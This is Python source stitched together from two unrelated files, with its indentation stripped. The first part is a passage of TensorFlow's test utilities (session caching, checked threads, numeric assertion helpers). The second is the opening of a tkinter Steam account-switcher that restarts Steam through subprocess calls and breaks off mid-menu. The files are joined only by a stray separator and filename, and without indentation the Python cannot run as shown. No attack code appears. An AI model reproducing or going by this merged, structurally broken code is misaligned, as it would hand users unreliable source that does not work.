class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session(use_gpu=True) as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield None
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is a tensor then convert it to ndarray
if isinstance(a, ops.Tensor):
if isinstance(a, ops._EagerTensorBase):
return a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# tell user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections.Mapping)
if a_is_dict != isinstance(b, collections.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if not work, then traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
def assertNotAllClose(self, a, b, **kwargs):
"""Assert that two numpy arrays, or or Tensors, do not have near values.
Args:
a: the first value to compare.
b: the second value to compare.
**kwargs: additional keyword arguments to be passed to the underlying
`assertAllClose` call.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, **kwargs)
except AssertionError:
return
raise AssertionError("The two values are close at all elements")
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %s. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = {}".format(x))
msgs.append("not equal rhs = {}".format(y))
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate
lines. A line of ellipses (...) will be appended at the end if the number of
subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound)
if open_lower_bound else np.less(target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
if not isinstance(target, list):
arrays = [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError(
"Exception of type %s: %s" % (str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = allow_soft_placement
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif not allow_soft_placement and config.allow_soft_placement:
config_copy = config_pb2.ConfigProto()
config_copy.CopyFrom(config)
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in
the documentation of `tf.train.Server`.
worker_config: (optional) ConfigProto to initialize workers. Can be used
to instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer, producer_version
def dismantle_func_graph(func_graph):
"""Removes reference cycles in `func_graph` FuncGraph.
Helpful for making sure the garbage collector doesn't need to run when
the FuncGraph goes out of scope, e.g. in tests using defun with
@test_util.run_in_graph_and_eager_modes(assert_no_eager_garbage=True).
Args:
func_graph: A `FuncGraph` object to destroy. `func_graph` is unusable
after this function.
"""
# TODO(b/115366440): Delete this method when a custom OrderedDict is added.
# Clearing captures using clear() leaves some cycles around.
while func_graph.captures:
func_graph.captures.popitem()
memory.dismantle_ordered_dict(func_graph.captures)
ops.dismantle_graph(func_graph)
def dismantle_polymorphic_function(func):
"""Removes reference cycles in PolymorphicFunction `func`.
Helpful for making sure the garbage collector doesn't need to run when
PolymorphicFunction goes out of scope, e.g. in tests using defun with
@test_util.run_in_graph_and_eager_modes(assert_no_eager_garbage=True).
Args:
func: A `PolymorphicFunction` object to destroy. `func` is unusable
after this function.
"""
# TODO(b/115366440): Delete this method when a custom OrderedDict is added
cache = func._function_cache # pylint: disable=protected-access
for concrete_func in cache.values():
dismantle_func_graph(concrete_func.graph)
while cache:
cache.popitem()
memory.dismantle_ordered_dict(cache)
|
main.py
|
import tkinter as tk
import tkinter.ttk as ttk
import tkinter.font as tkfont
from tkinter.scrolledtext import ScrolledText
from tkinter import messagebox as msgbox
import gettext
import winreg
import subprocess
import os
import sys
import queue as q
from time import sleep
from ruamel.yaml import YAML
from PIL import Image, ImageTk
from modules.account import acc_getlist, acc_getdict, loginusers
from modules.reg import fetch_reg, setkey
from modules.config import get_config, config_write_dict, config_write_value, SYS_LOCALE
from modules.util import steam_running, StoppableThread, open_screenshot, raise_exception, test, get_center_pos, launch_updater, create_shortcut
from modules.update import start_checkupdate, hide_update, show_update, update_frame_color
from modules.ui import DragDropListbox, AccountButton, AccountButtonGrid, SimpleButton, WelcomeWindow, steamid_window, ToolTipWindow, ask_steam_dir, get_color
from modules.avatar import download_avatar
yaml = YAML()
LOCALE = get_config('locale')
t = gettext.translation('steamswitcher',
localedir='locale',
languages=[LOCALE],
fallback=True)
_ = t.gettext
# For ImageTk, global variables must be used to prevent them from being GC'd.
image1 = None
iamge2 = None
image3 = None
image4 = None
def legacy_restart(silent=True):
'''Legacy steam restart function for refresh function.
New restarter with threading doesn't seem to work well with refreshing.'''
try:
if steam_running():
if get_config('steam_path') == 'reg':
raw_path = fetch_reg('steampath')
else:
raw_path = get_config('steam_path').replace('\\', '/')
raw_path_items = raw_path.split('/')
path_items = []
for item in raw_path_items:
if ' ' in item:
path_items.append(f'"{item}"')
else:
path_items.append(item)
steam_exe = "\\".join(path_items) + '\\steam.exe'
print('Steam.exe path:', steam_exe)
subprocess.run(f"start {steam_exe} -shutdown", shell=True,
creationflags=0x08000000, check=True)
print('Shutdown command sent. Waiting for Steam...')
sleep(2)
counter = 0
while steam_running():
print('Steam is still running after %s seconds' % str(2 + counter))
if counter <= 10:
counter += 1
sleep(1)
continue
else:
msg = msgbox.askyesno(_('Alert'),
_('After soft shutdown attempt,') + '\n' +
_('Steam appears to be still running.') + '\n\n' +
_('Click yes to wait more for 10 seconds or no to force-exit Steam.'))
if msg:
counter = 0
continue
else:
raise FileNotFoundError
else:
print('Steam is not running.')
except (FileNotFoundError, subprocess.CalledProcessError):
print('Hard shutdown mode')
subprocess.run("TASKKILL /F /IM Steam.exe",
creationflags=0x08000000, check=True)
print('TASKKILL command sent.')
sleep(1)
if silent:
print('Launching Steam silently...')
subprocess.run("start steam://open",
shell=True, check=True)
else:
print('Launching Steam...')
subprocess.run("start steam://open/main",
shell=True, check=True)
class MainApp(tk.Tk):
'''Main application'''
def __init__(self, version, url, bundle, std_out, std_err, after_update):
sys.stdout = std_out
sys.stderr = std_err
self.accounts = acc_getlist()
self.acc_dict = acc_getdict()
self.demo_mode = False
self.BUNDLE = bundle
self.after_update = after_update
tk.Tk.__init__(self)
self['bg'] = get_color('window_background')
self.title(_("Account Switcher"))
self.window_width = 310
self.window_height = 465
center_x, center_y = get_center_pos(self, self.window_width, self.window_height)
if get_config('last_pos') != '0/0':
pos_x, pos_y = get_config('last_pos').split('/')
else:
pos_x, pos_y = center_x, center_y
self.geometry(f'{str(self.window_width)}x{str(self.window_height)}+{str(pos_x)}+{str(pos_y)}')
self.resizable(False, False)
self.protocol('WM_DELETE_WINDOW', self.exit_app)
try:
self.iconbitmap('asset/icon.ico')
except tk.TclError:
pass
if not test():
ask_steam_dir()
menubar = tk.Menu(self)
if SYS_LOCALE == 'ko_KR':
menu_font = tkfont.Font(self, size=9, family='맑은 고딕')
menu = tk.Menu(menubar, tearoff=0, font=menu_font)
else:
menu = tk.Menu(menubar, tearoff=0)
menu.add_command(label=_('Import accounts from Steam'),
command=self.importwindow)
menu.add_command(label=_("Add accounts"),
command=self.addwindow)
menu.add_command(label=_("Edit account list"),
